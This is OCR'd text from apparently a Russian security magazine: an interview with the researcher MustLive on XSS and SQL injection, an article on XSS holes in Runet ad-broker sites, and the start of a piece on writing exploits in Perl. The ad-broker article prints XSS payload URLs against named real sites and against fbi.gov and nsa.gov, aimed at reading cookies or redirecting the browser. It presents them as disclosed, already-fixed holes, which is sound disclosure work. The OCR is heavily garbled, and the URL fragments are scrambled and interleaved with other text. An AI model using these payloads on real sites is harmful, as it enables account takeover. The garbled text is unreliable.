угроз извне, то какое место 

заняли бы SQL Injection и Х$$ 

В ЭТОМ «Хит-параде»? 

А: Данные уязвимости были бы одни- 
ми из первых. Логичнее разделить их 
«топ» на два: наиболее опасная и наи- 
более распространенная уязвимость. 

В рейтинге наиболее опасных 
на первое место я поставил бы РНР- 
инклюдинг и удаленное исполнение 
кода (через тот же PHP file inclusion). 
Далее идет Х$$, в различных его 
проявлениях. Далее SQL Injection. A 
после — другие уязвимости, такие как 
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слабые пароли (что нередко встреча- 
ется), Directory indexing, Full path dis- 
closure и другие. 

В рейтинге наиболее распро- 
страненных вначале я поставил бы 
Cross-Site Scripting, далее Full path 
disclosure, РНР-инклюдинг, SQL Injec- 
tion, Directory indexing и другие. 

О: Какие цели обычно, преследуют 
хакеры, используя SQL Injection 

или XSS? И что реально они 

могут получить? 

А: Основная цель хакеров — это полу- 
чение конфиденциальной информа- 
ции, паролей и других данных (напри- 
мер, текущей сессии пользователя), 
в основном с целью наживы. И вне за- 
висимости от того, действует ли хакер 
в одиночку или же это организованная 
преступная группа, их цель — это день- 
ги. Конечно, это может быть еще и про- 
мышленный шпионаж, месть или про- 
сто желание навредить, но основной 
упор все же на получение прибыли. 

Захватывают обычно логины 
и пароли (или сессии) с нужных сай- 
тов, где хранятся деньги или непо- 
средственно учетные данные веб-ко- 
шельков, либо информация кредит- 
ных карт. Другой вариант — захват 
важных данных с целью перепрода- 
жи или шантажа. Цель нанесения 
ущерба также возможна, в том числе 
на заказ. А вот случаев баловства, 
взлома от нечего делать или для де- 
монстрации своих возможностей все 
меньше и меньше. 

Все чаще встречаются именно 

спланированные целенаправленные 
атаки. А также взломы ради получе- 
ния данных для спам-рассылок или 
захвата ПК с целью создания спам- 
бота (опять же, для спам-рассылок). 
О: Каков процент сайтов, 
которые можно в любой момент 
атаковать посредством SQL Injection 
или XSS? 
А: Точно сказать сложно, как в гло- 
бальных масштабах, так и в масшта- 
бах гинета или ианета в частности. 
Статистику мало кто ведет, проводит- 
ся очень мало соответствующих ис- 
следований. Можно в качестве при- 
мера использовать данные компании 
Acunetix (http://websecurity.com.ua/120/): 
SQL Injection имеет 9%, a Cross Site 
Scripting — 27% сайтов. Эти данные 
компания приводит, исходя из оши- 
бок, найденных их сканером безо- 
пасности (и это в основном запад- 
ные сайты). 


Я исхожу из своей практики об- 
наружения уязвимостей — в гинете 
и чанете Х$$-уязвимости нахожу 
практически на каждом сайте, так что 
потенциально Х$$-уязвимости могут 
быть на 90% сайтов. SQL Injection 
встречается реже, потенциально до 
10% сайтов могут иметь подобные 
уязвимости. Причем Х$$-уязвимости 
могут быть на сайтах без использова- 
ния серверных скриптов (http://webse- 
curity.com.ua/127/), и от платформы сай- 
та это не зависит. 

О: Практически все новостные 
ленты, посвященные безопастности, 
кишат предупреждениями 

о возможности SQL Injection или 
XSS. Тем не менее, создается 
впечатление, что их читают только 
сами модераторы и узкий круг 
специалистов, которые порой могут 
не иметь прямого отношения к Web. 
Что это — рядовой пофигизм? 

А: С одной стороны, имеет место рав- 
нодушие к проблеме. С другой сторо- 
ны, причина этому — недостаток зна- 
ний. Общественность нужно просве- 
щать на тему безопасности. Люди 
должны знать, что существуют уязви- 
мости, что они могут нанести вред и 
что нужно следить за безопасностью 
своих веб-сайтов, веб-приложений и 
веб-систем. Нужно регулярно прово- 
дить аудит безопасности и следить за 
новостями о вновь найденных уязви- 
мостях. А также нужно просвещать 
веб-разработчиков по вопросам бе- 
зопасности, что я и делаю в своем ру- 
ководстве — http://websecurity.com.ua/se- 
curity/. Иначе, действительно, подоб- 
ные материалы читают лишь специа- 
листы по безопасности, и Te, кому эта 
тема интересна как смежная с их дея- 
тельностью. А также хакеры, которые 
разрабатывают или используют эти 
же дыры и эксплойты. Ну, и скрипт- 
киддисы. 

О: Каки в какой именно 
последовательности ты проверяешь 
ресурсы на брешь в системе 
безопасности? 

А: Меня часто спрашивают, какие 
сканеры я использую... Я не исполь- 
зую никаких. И регулярно пишу у се- 
бя в новостях о дырах на сайтах секь- 
юрити-фирм (например, на сайте 
разработчика ISS Internet Scanner — 
http://websecurity.com.ua/378/), которые 
эти сканеры выпускают. Так что про- 
ку отних немного. Использую исклю- 
чительно свои знания и опыт, а в ка- 


честве рабочих инструментов высту- 
пают браузер (Mozilla B основном) и 
текстовый редактор (GVIM). Первый 
для тестирования, второй — для за- 
писи результатов. Причем оба ин- 
струментария open source, так что у 
меня весьма открытый подход. И зна- 
ния мои от части Open зоигсе, так как 
делюсь с посетителями моего проек- 
та (http://websecurity.com.ua), публикуя 
информацию о своих исследованиях. 

Как таковой последовательно- 
сти поиска уязвимостей не существу- 
ет, к каждому ресурсу я всегда подхо- 
жу индивидуально. Плюс интуитивно 
чувствую, где могут быть дыры. Если 
на сайте присутствуют фильтры (за- 
щищающие, например, от XSS), то 
стараюсь их обойти, когда чувствую, 
что есть такая возможность, для чего 
разрабатываю собственные методы. 
Поэтому если дыра есть, обязатель- 
но найду и разработаю методику ее 
эксплуатации (чтобы показать адми- 
нам этого сайта потенциальную воз- 
можность использования существую- 
щей уязвимости). 

О: Как люди обычно реагируют 

на твои сообщения об уязвимостях? 
А: Реагируют весьма разнообразно. 
Кто просто благодарит, кто вдобавок 
к благодарности просит, чтобы еще 
сообщили о каких-либо уязвимостях 
на их сайте. Некоторые предлагают 
сотрудничество, причем в различных 
направлениях: кто в области безо- 
пасности и на длительный срок, кто 
предлагает провести детальный секь- 
юрити-аудит сайта, кто в области веб- 
разработки. А бывают случаи, когда 
предлагают купить и меня, и мой сайт 
со всеми потрохами. Некоторые лю- 
ди задают вопросы касательно дыр 
на их сайте, в частности, по некото- 
рым типам уязвимостей и по их экс- 
плуатации. Но главное, чтобы люди 
поняли риски найденных на их сайте 
уязвимостей и исправили их. 

Также бывает, что грубят. Что 
мол, не понимают ничего в данном 
вопросе и не видят никакой опасно- 
сти, либо вообще не знают, о чем я 
толкую. Или не видят повода для бес- 
покойства. А бывает, и нередко, что 
вообще никак не реагируют. И сайты 
так и остаются дырявыми... 

О: Сколько администраторов 
прислушивается к твоим 
предупреждениям об уязвимостях? 
А: Если попытаться усреднить, то полу- 
чится следующая картина. 60% адми- 


нов отвечают на мое письмо, из них 
59% админов исправляют уязвимости, 
1% админов — не исправляют. 40% ад- 
минов не отвечают на мое письмо, 
из них 30% админов — исправляют 
уязвимости, 10% админов — не испра- 
вляют. Так что практически 90% адми- 
нов исправляют указанные мною уяз- 
вимости. Это и есть эффективность пу- 
бличной работы. А ведь эти дыры мо- 
гли бы годами висеть и эксплуатиро- 
ваться «добрыми» людьми. 

О: Как проверить собственный 
ресурс? Есть ли какие-нибудь 
готовые тесты, с помощью которых 
можно локализовать лазейки для 
применения SQL injection или XSS? 
A: Тестировать свой ресурс можно как 
самостоятельно, так и обратившись к 
профессионалам. Есть различные 
компании, фирмы и частные секьюри- 
ти-специалисты, которые занимаются 
этим профессионально. Другое дело, 
что именно на веб-безопасности ма- 
ло кто специализируется, но и такие 
деятели есть. Их можно найти через 
личные сайты, на сайтах секьюрити- 
тематики или на хакерских форумах. 
Достаточно обратиться с просьбой 
найти исполнителя, который проте- 
стирует сайт на уязвимости. 

Готовых тестов нет, но есть 
секьюрити-сканеры. Например, XSpi- 
der российского разработчика Positi- 
ve Technologies (недавно вышла 7-ая 
версия). Есть у него и онлайн-вер- 
сия — http://online.xspider.ru. Но сканеры 
могут лишь частично решить вопрос 
тестирования безопасности веб-сай- 
та или веб-приложения. Ни один ска- 
нер не заменит эксперта. 

О: Есть ли пошаговое пособие, как 
защититься от SQL Injection и XSS? 
Или все сугубо индивидуально? 

A: Нужны знания. Поэтому нужно чи- 
тать о разных типах уязвимостей, 
чтобы знать их особенности. Также 
нужно читать об уязвимостях в раз- 
личных системах, о конкретных ды- 
рах. Чтобы знать, где в твоей системе 
дыра и как исправить (при наличии 
навыков программирования) именно 
ее. Нередко в описании уязвимостей 
сразу приводят необходимые испра- 
вления для устранения указанных 
дыр. Например, MustLive Security 
Pack (http://websecurity.com.ua/security- 
pack/) — мое собственное руковод- 
ство по исправлению уязвимостей. 
Так что информация есть, нужно 
лишь искать ее. 


О: Kak от SQL injection и XSS 
защищаются гиганты рунета типа 
Яндекса, Рамблера и Май.ги? 

А: Не лучшим образом. Это я знаю 
не понаслышке и не из новостей секь- 
юрити-сайтов, а из собственного 
опыта. Так как регулярно нахожу уяз- 
вимости на таких крупных сайтах. 
Причем SQL injection на подобных 
проектах мне не попадались, а вот 
XSS — весьма часто. 


Яндекс: 

xss на images.yandex.ru 
http://websecurity.com.ua/3/; 

xss на WWW.yandex.ru 
http://websecurity.com.ua/36/; 

XSS в коде яндекс-директ, 

что подвергают Х$$-атакам сайты 
партнеров http://websecurity.com.ua/398/. 


Рамблер: 

xss на adstat.rambler.ru 
http://websecurity.com.ua/11/; 
xss на Www.rambler.ru 
http://websecurity.com.ua/17/; 
xss Ha lenta.ru 
http://websecurity.com.ua/23/; 
xss Ha horoscopes.rambler.ru 
http://websecurity.com.ua/40/; 
xss Ha lenta.ru 
http://websecurity.com.ua/149/. 


Mail.ru: 
xss Ha drive.mail.ru 
http://websecurity.com.ua/405/ 


Кроме этих лидеров, доводилось Ha- 
ходить уязвимости на многих других 
известных и популярных ресурсах: 
aport.ru, go.km.ru, спемиз.ги, www.rbc.ru, 
www.quote.ru, spylog.ru, на сайтах MHO- 
гих рекламных брокеров, 3dnews.ru 
(и blog.3dnews.ru) и многих других. 
И это только те, о которых я так или 
иначе упомянул у себя на сайте. 

О: Некоторые идут простым путем — 
максимально маскируют работу 
движка, дабы не перебирать все 
возможные варианты. Не видно — 

и ладно: злоумышленник даже не 
узнает, успешно ли прошла атака. 

Но так ли это в действительности? 

А: Такой вариант, конечно, возможен, 
и маскировка является одним из ва- 
риантов защиты. Если используешь 
какой-нибудь открытый движок, бе- 
решь себе новый скин, убираешь все 
упоминания о версии движка или да- 
же об его имени, при желании меня- 
ешь структуру каталогов (нередко 


именно она выдает тебя, как бы ты не 
«прятал» движок). Или, как вариант, 
меняется расширение. Например, на 
HTML, хотя используется Рей или 
РНР — с целью ввести атакующего в 
заблуждение. 

Правда, все эти приемы могут 
отпугнуть новичка, неопытного хаке- 
ра или скрипт-киддиса, а профессио- 
нала не проведешь. И если есть ды- 
ра, то он ее обязательно найдет. Или 
если каким-то образом узнает, какой 
движок на самом деле на сайте, 
то сможет простым перебором уязви- 
мостей и эксплойтов выяснить, какая 
версия, и похакать сайт. Или же про- 
ведет исследование системы как 
черного ящика и самостоятельно 
найдет уязвимость. 

Так что маскировка — малоэф- 
фективный способ. Исключением яв- 
ляется лишь отключение вывода со- 
общений об ошибках базы данных. 
В таком случае проводить атаку SQL 
Injection сложнее, но и это не пробле- 
ма для профи (ведь есть же Blind SQL 
Injection). Отключение ошибок спаса- 
ет от SQL DB Structure Extraction 
и внекоторых случаях OT XSS-yasBu- 
мостей (когда через вывод сообще- 
ния об ошибке производят XSS-ata- 
ку, что встречается в различных 
движках). 

О: Правда ли, что сайты на flash 
избавлены от проблем SQL injection 

u XSS? Или это миф? 

А: Сам флеш или флеш-элементы, 
которые используются на сайте, не- 
уязвимы для SQL Injection и XSS. Ho B 
случае использования на сайте Ka- 
ких-либо скриптов (например, РНР- 
скрипта для доступа к БД) классиче- 
ские уязвимости могут иметь место. 

Хотя и с флешем не все так 
гладко. Во флеше имеется возмож- 
ность (необходим флеш-плеер соот- 
ветствующей версии, не пропатчен- 
ный) отсылать НТТР-запрос (www.se- 
curitylab.ru/analytics/271169.php), что по- 
зволяет создать злоумышленную 
флешку, которая будет совершать 
Х$5$-атаки на пользователей, прос- 
матривающих ее в своем браузере. 
Например, можно загрузить флешку 
В «социальные сети» или разместить 
ее на сайте, и каким-то образом за- 
манить туда пользователей. Или да- 
же разместить флеш-баннер в бан- 
нерной сети или в рекламном броке- 
ре, включив в него зловредный код. 
То есть атакованный сайт не обяза- 


тельно должен быть на флеше, даже 
наоборот — он вполне может быть 
на НТМЕ (и даже не содержать ника- 
ких флеш-элементов). 

Подробнее касательно межсай- 

тового скриптинга в языке Flash мож- 
но прочитать на hittp://websecurity.com.- 
ua/18/, а про инъекции в НТТР-заго- 
ловке — на http://websecurity.com.ua/373/. 
О: Насколько актуальна тема 
удаленного контроля через XSS? 
А: Весьма. Так как проводятся допол- 
нительные исследования в этой 
области (http://websecurity.com.ua/361/), 
появляется различный инструмента- 
рий для подобных задач (www.security- 
lab.ru/analytics/271931.php), например 
XSS Proxy, backweb, BeEF Exploitation 
Framework и XSS Shell. Все это может 
использоваться (и используется) для 
различных, в основном точечных 
атак, с целью хищения конфиден- 
циальной информации, паролей 
и для промышленного шпионажа. 

Также удаленный контроль че- 
рез Х$$ может быть использован для 
более глобальных атак, начиная от 
захвата сайтов (которые просто так 
не взломаешь) и заканчивая атаками 
на локальные машины и локальные 
сети предприятий = (http://websecuri- 
ty.com.ua/369/). 

О: Что посоветуешь тем, 

кто только проектирует свой 
будущий ресурс? 

А: Уже на этапе проектирования уде- 
ляй внимание безопасности. И пиши 
корректный код. А для этого, конеч- 
но, нужен опыт и знания. Читай ин- 
формацию по теме, например мое ру- 
ководство по безопасности (http://web- 
security.com.ua/security/), предназначен- 
ное для веб-разработчиков. 

Проверяй свои веб-сайты, веб- 
приложения и веб-системы на уязви- 
мости — проводи аудиты безопасно- 
сти. По возможности делай это на на- 
чальном этапе. Но и для уже суще- 
ствующих проектов эти же мероприя- 
тия не менее актуальны. И не забы- 
вай после внесения изменений в веб- 
приложения проводить повторные 
проверки. 

Основная задача — увеличение 
уровня безопасности каждого сайта 
в отдельности и, соответственно, ин- 
тернета в целом. Ведь если каждый 
будет думать о безопасности еще 
на этапе проектирования сайта, то и 
ломать будет нечего. Пока же до это- 
го далеко... © 
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http:/Awebsecurity.com.ua/120/ 
статистика веб-атак 


http:/Avebsecurity.com.ua/127/ 
хакинг сайта. через уязвимости в коде 
внешних систем 


http:/Avebsecurity.com.ua/474/ 
хакерская активность в чанете в 2006 году 


http:/Awebsecurity.com.ua/security/ 
руководство по безопасности 


http://websecurity.com.ua/378/ 
уязвимость на www.iss.net 
http://online.xspider.ru 

XSpider Online 


http:/Awebsecurity.com.ua/security-pack/ 
MustLive Security Pack 


http:/Avebsecurity.com.ua/3/ 
Cross-Site Scripting Ha Яндексе 


http:/Awebsecurity.com.ua/36/ 
новые уязвимости на Яндексе 


http:/Avebsecurity.com.ua/398/ 
уязвимости в Yandex-Direct 


http://websecurity.com.ua/11/ 
Cross-Site Scripting Ha Рамблере 


http://websecurity.com.ua/17/ 
новая уязвимость на Рамблере 


http:/Avebsecurity.com.ua/23/ 
XSS ua lenta.ru 


http:/Awebsecurity.com.ua/40/ 
новая Х5$-уязвимость на Рамблере 


http:/Avebsecurity.com.ua/149/ 
уязвимость Ha lenta.ru 


http:/websecurity.com.ua/405/ 
уязвимость Ha drive.mail.ru 


http:/Awww.securitylab.ru/analytics/271169.php 
подделка заголовков НТТР-запроса 
с помощью Flash ActionScript 


http://websecurity.com.ua/18/ 
межсайтовый скриптинг в Shockwave Flash 


http://websecurity.com.ua/373/ 
Flash plugin HTTP header injection 


http:/Awebsecurity.com.ua/361/ 
XSS для удаленного контроля 


http:/Avww.securitylab.ru/analytics/271931.php 
продвинутый межсайтовый скриптинг с 
удаленным контролем в реальном времени 


http:/Avebsecurity.com.ua/369/ 
использование уязвимостей на локальных 
машинах 


Речь идет о рекламных интернет-брокерах. Это од- 
на из наиболее динамичных категорий в рекламном 
секторе рунета (помимо баннерных сетей, реклам- 
ных агентств и частных рекламных поползновений). 
Среди форматов, поддерживаемых рекламными 
брокерами, можно выделить баннерную рекламу 
(различных размеров, обычно форматов gif и jpg), 
флеш-рекламу (формат swf) и текстовую (в том чис- 
ле и контекстную). Оплата, соответственно, за кли- 
ки, показы и за время размещения. Каждый брокер 
имеет свои особенности и свои плюсы, предлагая 
различные услуги для веб-мастеров и рекламода- 
телей. Через брокеров интернет-рекламы ежеднев- 
но проходят денежные потоки, и это могут быть 
весьма солидные суммы. 

Подобная ситуация привлекает к рекламным 
брокерам внимание в том числе и злоумышленни- 


i 


Реклама с подвохом 


шаманские дела 


МНОГИЕ ВЕБ-МАСТЕРА ЗАДУМЫВАЛИСЬ О ЗАРАБОТКЕ ЗА СЧЕТ РАЗМЕЩЕНИЯ РЕКЛАМЫ 
НА СВОИХ САЙТАХ. ПОДОБНЫЕ СЕРВИСЫ СУЩЕСТВУЮТ В РУНЕТЕ И ИХ ЧИСЛО ПОСТОЯННО 
РАСТЕТ. НО В ИНТЕРНЕТ-РЕКЛАМЕ ЕСТЬ СВОИ ПОДВОДНЫЕ КАМНИ. 


Евгений Докукин aka Mustlive 
mustlive @ websecurity.com.ual 


ков. Проанализируем ситуацию Ha рынке рекламных 
интернет-брокеров рунета. В контексте безопаснос- 
ти и, в частности, Cross-Site Scripting уязвимостей. 
Х$$-уязвимости могут быть использованы 
с целью захвата учетной записи пользователя, для 
получения конфиденциальной информации и де- 
Her, накопленных на пользовательском аккаунте. 
Ниже мы приведем примеры некоторых бро- 
керов, на сайтах которых имели место уязвимости 
(данный список не полон, и не стоит считать, что у 
других интернет-брокеров таких проблем не быва- 
ет). Все приведенные примеры, исходя из здраво- 
го смысла и этических соображений, содержат 


РЕКЛАМНЫЕ ИНТЕРНЕТ-БРОКЕРЫ ПРЕДСТАВЛЯЮТ ЛАКОМЫЙ КУСОК 
ДЛЯ ЗЛОУМЫШЛЕННИКОВ, ПОТОМУ ЧТО ЧЕРЕЗ НИХ ПРОКАЧИВАЮТСЯ 
ДОСТАТОЧНО МОЩНЫЕ ДЕНЕЖНЫЕ ПОТОКИ 


Х$5$-уязвимости, о которых сами интернет-броке- 
ры знают и которые уже исправлены. Это сделано 
в целях безопасности самих брокеров и их участни- 
ков. Также следует понимать, что мы ратуем за бе- 
зопасность и надеемся, что примеры помогут всем 
осознать серьезность ситуации и проверить 
собственные проекты на аналогичные уязвимости. 
Использование же примеров Х$$-уязвимостей 
где бы то ни было — на совести (а, следовательно, 
и ответственности) читателя. 
>  www.clx.ru. ХЗ$-уязвимости имели место, но 
администраторы сделали основной упор на совер- 
шенствовании системы авторизации, введя до- 
полнительное ограничение времени сессии и при- 
вязку сессии к |Р-адресу. Это позволило повысить 
безопасность системы в целом, частично оградив 
ее от потенциальных XSS. Ho 100% защиты такой 
подход не дает, и периодически приходится отлав- 
ливать и исправлять найденные уязвимости. 
www.prospero.ru, Www.procontext.ru, WWW.Se0- 
point.ru. Все три проекта принадлежат одним и тем 


же людям, просто ориентированы на разную целе- 
вую аудиторию. К примеру, РВОСОМТЕХТ — это 
контекстная реклама, которая ранее была доступна 
в самом РВО$РЕНО, но затем ее искусственно вы- 
делили в отдельный проект, чтобы развязать руки 
основному проекту при совершенствовании кода 
и функциональности. 

Уязвимости в этих системах обнаруживались 
неоднократно, но надо отдать должное оператив- 
ности администраторов, которые делали любые 
проблемы достоянием истории, оперативно внося 
необходимые изменения. Также они серьезно повы- 
сили безопасность, усовершенствовав систему ав- 
торизации, введя дополнительные ограничения по 
времени сессии и привязке сессии Kk IP-agpecy (ана- 
логия с CLX). 

Приведем Х$$-уязвимость, которая имела 
место на форумах всех трех проектов (движок один 
и тот же). Она затаилась в параметре search_words 
для поиска по форуму: 


ВЕЕР: //www.prospero.ru/forum_search? 
search=1&ésearch_words=%27%3E%3Cscript% 
3Ealert%28document .cookie%29%3C% 
2Fscript33E 

http: //procontext.ru/forum_search? 
search=1lésearch_words=%27%3E%3Cscript% 
3Ealert%28document .cookie%29%3C% 
2Fscript%33E 
http://seopoint.ru/forum_search?search= 
l&search_words=%27%3E%3Cscript33Ealert% 
28document . cookie$29%3C%2Fscript%3E 


>  www.mainlink.ru. Пример эксплуатации имев- 
шей место уязвимости: 


БЕЕр: / /малп110К.ка/ Е1па/ ?what=%3Cscript 
%3Ealert (document .cookie) $3C/script%3E 


>  www-.setlinks.ru. Пример эксплуатации имев- 
шей место уязвимости — на странице 
http://www.setlinks.ru/partner/editpage.html?id=xxxx 
при отправке POST-3anpoca (в полях «Раздели- 
тель» и «Класс ссылок»): 


"S<script>alert (document .соок1е) </script> 


> — www.adbroker.ru. Пример эксплуатации имев- 
шей место уязвимости: 


БЕЕр: //adbroker.ru/user_partner.php 
Paction=adv_queries&uarq_order=4%22%3E% 


http://www.fbi. 


http://www.fbi. 
http://www. fbi. 


gov] 


alert (%22XSS%22) 33E 
alert («XSS») , 
http: //www.nsa. 


только IE 
alert (document .cookie) %3Е 

alert (document.cookie), только IE 
http: //www.nsa. 


3Cscript%3Ealert (document .cookie) % 
3C/script%3E 

http: //adbroker.ru/get_code.php?scid= 
2484&1id=1&css_class=%22%3E%3Cscript% 
3Ealert (document .cookie) $3C/script%3E 


>  www.affiliatenetwork.ru. Пример эксплуатации 
имевшей место уязвимости: 


http://www.affiliatenetwork.ru/ 
affiliates_new/viewpaid.php?kol_zap_str= 
$22%3ES3Cscript%3Ealert (document. 
cookie) $3C/script%3E 


> ммм Лаки. Один из немногих интернет-бро- 
керов, администраторы которого, к сожалению, 


(1) 


gov/cgi-bin/outside.cgi?javascript:alert('XSS') 
gov/cgi-bin/outside.cgi?javascript:alert (document .cookie) 
gov/cgi-bin/outside.cgi?http://websecurity.com.ua 


(2) 


http: //www.nsa.gov/snac/downloads_db.cfim?MenulD=%22%3E%3Cimg%20src=javascript: 


gov/snac/downloads_db.cfm?MenulD=%22%3E%3Cimg%20src=javascript: 


gov/snac/downloads_db.cfm?MenulD=%22%3E%3Cimg%20src=javascript: 


document .location=%22http://websecurity.com.ua%22%3E 
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занимаются безопасностью проекта спустя рука- 
ва. В системе достаточно долго существовали ра- 
бочие Х$$-уязвимости, о которых администрация 
была оповещена. 


пример эксплуатации этой уязвимости: 


> www.context.meta.ua. Пример эксплуатации 
имевшей место уязвимости: 


> = уязвимости в партнерском коде. Упомянутые 
в системах контекстной рекламы (procontext.ru и соп- 
text.meta.ua) Х$$-уязвимости находятся в интерфейсах 
самих систем. Но возможны еще и атаки на сайты 
участников данных систем через уязвимости в парт- 
нерском коде, — если системы предлагают размещать 
партнерский код на сайте, особенно в случае интегра- 
ции рекламы с локальным поиском на сайте. (XSS- 


уязвимости в кодах систем ДиректЯндекс и Бегун). 


ВИДЫ Х$$-АТАК 


Cross-Site Scripting (также CSS и XSS) 
уязвимости в контексте веба (веб-при- 
ложения и веб-системы) — уязвимости 
на сайтах, которые могут привести 
к выполнению заданного нападающим 
кода в контексте браузера пользовате- 
ля, атакованного злоумышленником. 
Другими словами, это уязвимость в веб- 
приложениях с некорректно работаю- 
щими фильтрами входящей информа- 
ции, которая не проверяется должным 
образом перед тем, как вернуть резуль- 
тат пользователю. 

Среди возможных атак на пользова- 
телей рекламных интернет-брокеров 
с применением Х$$ можно выделить 
следующие: пассивный XSS, активный 
XSS и XSS в DOM. Каждая имеет свои 
особенности и позволяет злоумышлен- 
нику провести атаку на участника систе- 
мы, вплоть до захвата аккаунта. 

Пассивный Х$$. Самый распростра- 
ненный вид XSS. Для успешной атаки 
участник должен быть в системе (и вего 
кукисах должна храниться информация 
06 авторизации). После этого злоумыш- 
ленник, подготовив соответствующий 
рабочий Х$$-код для уязвимой стра- 
ницы, должен каким-то образом заста- 
вить пользователя системы исполнить 


его. Это возможно как путем сообще- 
ния жертве (по той же аське) «ссылки» 
на страницу (останется только убедить 
пользователя зайти на эту страницу), 
так и размещения «ссылки» на каком- 
то сайте (при этом можно спрятать ис- 
тинный адрес, чтобы пользователь ни- 
чего не заподозрил). После того как 
жертва, ничего не подозревая, попадет 
в ловушку, срабатывает «злобный» 
код и нападающий получает кукис жерт- 
вы савторизационной информацией. 
При этом жертва пропускает все мимо 
глаз и ушей. 

После получения конфиденциаль- 
ных данных с кукисами участника сис- 
темы злоумышленник может использо- 
вать их для входа в систему рекламно- 
го интернет-брокера от его имени с пос- 
ледующим нанесением ущерба как «об- 
ворованному» участнику, так и самому 
интернет-брокеру. 

Активный Х$$. Это менее распрост- 
раненный вид XSS. Но данная уязви- 
мость опаснее, так как может нанести 
вред большему количеству участников 
и процесс такой атаки более упрощен- 
ный по сравнению с пассивным XSS. 

Злоумышленник, использовав ак- 
тивную Х$$-уязвимость, заносит при- 
готовленный XSS-KOg в базу данных 
системы рекламного интернет-брокера. 
И далее ему не нужно морочить себе го- 
лову заманиванием жертвы в ловушку, 
так как она попадается сама, просто 


зайдя в аккаунт системы и посетив ту 
страницу, где отображаются данные 
из БД (вместе с кодом злоумышленни- 
ка). Получается, жертва самостоятель- 
но отдает свои кукисы, опять же, ничего 
не заметив. 

Получив конфиденциальные дан- 
ные с кукисами участника системы, 
злоумышленник, как и в первом случае, 
может использовать их для входа в сис- 
тему рекламного интернет-брокера от 
имени юзера с последующим захватом 
аккаунта. 

XSS в DOM (DOM Based XSS). От- 
дельный и весьма опасный вид уязви- 
мостей межсайтового скриптинга — 
стандартные фильтры против класси- 
ческих XSS в этом случае не помогут. 

Методика атаки подобна методике 
в случае пассивного Х$$. Точно так же 
злоумышленник подготавливает злона- 
меренный код для уязвимой страницы 
и заманивает в ловушку пользователя 
системы. После чего получает его кукис 
и контроль его аккаунта. Принципиаль- 
ная разница — в особенностях работы 
Х$$ в DOM — фильтры, направленные 
на классические XSS, не помогают (к при- 
меру, фильтрация угловых скобок), 
и заданный код выполняется на уязви- 
мой странице. 

Подобные уязвимости могут встре- 
чаться как в коде систем рекламных ин- 
тернет-брокеров, так и в партнерском 
коде системы контекстной рекламы. 


> — мммм.Бедип.ги. Хотя уязвимость была в конте- 
кстном коде Бегуна, она ставила под вопрос безо- 
пасность кода сайтов-партнеров, в данном приме- 
ре — сайта Рамблера: 


Эта уязвимость относится к типу Х$$ в DOM и мо- 
жет быть опасна для всех посетителей сайта. 

>  http://direct.yandex.ru. В ДиректЯндексе име- 
ла место Х$$-уязвимость, причем как собственная 
(в самой системе), так и уязвимость в коде, который 
используется сайтами-партнерами (на примере 
сайта itnews.com.ua): 


Эта уязвимость так же относится ктипу XSS в DOM 
и может быть использована против всех посетите- 
лей сайта. Сейчас все эти уязвимости уже нейтра- 
лизованы. 

> заключение. К сожалению, и сейчас ситуация 
с уязвимостями Х$$ на сайтах некоторых интернет- 
брокеров складывается не лучшим образом. А си- 
деть на «пороховой бочке» и ждать, когда рва- 
нет, — не самый лучший выход. Но с каждой исп- 
равленной Х$$ дырой ситуация улучшается. Поэто- 
му призываем администраторов серьезнее относит- 
ся к проблеме безопасности и проверить свои про- 
екты, как минимум, на наличие описанных выше 
уязвимостей. © 
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Инструментарий кодера эксплойтов под Реп 


ИНОГДА ТРЕБУЕТСЯ АВТОМАТИЗИРОВАТЬ ПРОЦЕСС ПОИСКА УЯЗВИМОСТИ ИЛИ БЫСТРО 
ПРОВЕРИТЬ ВАРИАНТЫ ИСПОЛЬЗОВАНИЯ КАКОГО-ЛИБО НЕДОЧЕТА В КОДЕ. КОДИТЬ 
ДЛЯ КАЖДОГО ТАКОГО СЛУЧАЯ НА «СИ» СЛИШКОМ УТОМИТЕЛЬНО И НЕРАЦИОНАЛЬНО. 
В ЭТОМ СЛУЧАЕ НАМ НА ПОМОЩЬ ПРИДЕТ PERL, КОТОРЫЙ ПОЗВОЛЯЕТ БЫСТРО ПИСАТЬ 


КОРОТКИЕ И ФУНКЦИОНАЛЬНЫЕ ЭКСПЛОЙТЫ. 


Inside 
lbrain_insider @ тай.ги 


Эта статья не является руководством по програм- 
мированию на Perl, равно как и не является руково- 
дством по написанию эксплойтов: в ней мы коротко 
рассмотрим основные инструменты, которые могут 
для этого потребоваться. 

Если ты опытный секьюрити-специалист и зна- 
ешь «что почем» в мире сетевой безопасности, то 
следующий абзац можешь смело пропустить. В слу- 
чае же, если ты только планируешь приступить к на- 
писанию собственных эксплойтов и подыскиваешь 
инструменты, я представлю твоему вниманию один 
такой и обосную, чем и как он может быть полезен. 
Для чтения этой статьи необходимы лишь базовые 
знания Рен, так что не стоит пугаться, если этот язык 
тебе не знаком. Примеры просты настолько, что, 
при наличии опыта программирования на любом 
другом языке, ты легко сможешь в них разобраться. 

А для начала давай вспомним, что же такое 
эксплойт, как его писать, и, главное, чем нам в этом 
нелегком деле может помочь Perl. 

Итак, эксплойт (exploit, англ.) в переводе 
с вражеского означает «использовать, пользовать- 
ся, эксплуатировать». В нашем случае мы эксплуа- 
тируем уязвимости, найденные в атакуемом софте. 
Таким образом, эксплойт — это код, который соз- 


дает условия для использования и использует неко- 
торую уязвимость в атакуемом приложении с неки- 
ми, несомненно зловещими, целями. Что же это мо- 
гут быть за цели? Да какие угодно, начиная 
DoS-atakoi на клиентский компьютер и заканчивая 
выполнением зловредного шелл-кода на сервере. 
Понятно, что тип эксплойта зависит от типа уязви- 
мости и целей, которые преследует взломщик. Од- 
нако есть наиболее общий класс задач, в контексте 
которых мы и приглядимся к Рен. 

Наиболее часто приходится писать удаленные 
эксплойты, которые не подразумевают наличия пря- 
мого доступа к целевой машине, а используют пре- 
доставляемый этой машиной удаленный сервис. Что 
нам может потребоваться для написания удаленно- 
го эксплойта? Очевидно, модули, позволяющие фор- 
мировать соединения на всех уровнях стека протоко- 
лов TCP/IP. Почему я рекомендую использовать для 
этих целей Реп? Perl, Ha мой взгляд, чрезвычайно 
прост в освоении. Для человека, знакомого с С/С++, 
освоение синтаксиса Рей займет максимум день- 
два. Для примера, один мой знакомый ;), когда того 
потребовала ситуация, освоил основные инструмен- 
ты Рей и написал первый скрипт на 200-300 строк 
в течение 10 часов. Надо заметить, что он отнюдь 
не полиглот. Perl чрезвычайно гибок и не навязыва- 
ет какой-то конкретный стиль программирования. 
Есть Реп-скрипты, которые при поверхностном прос- 
мотре сложно отличить от С, есть написанные в 


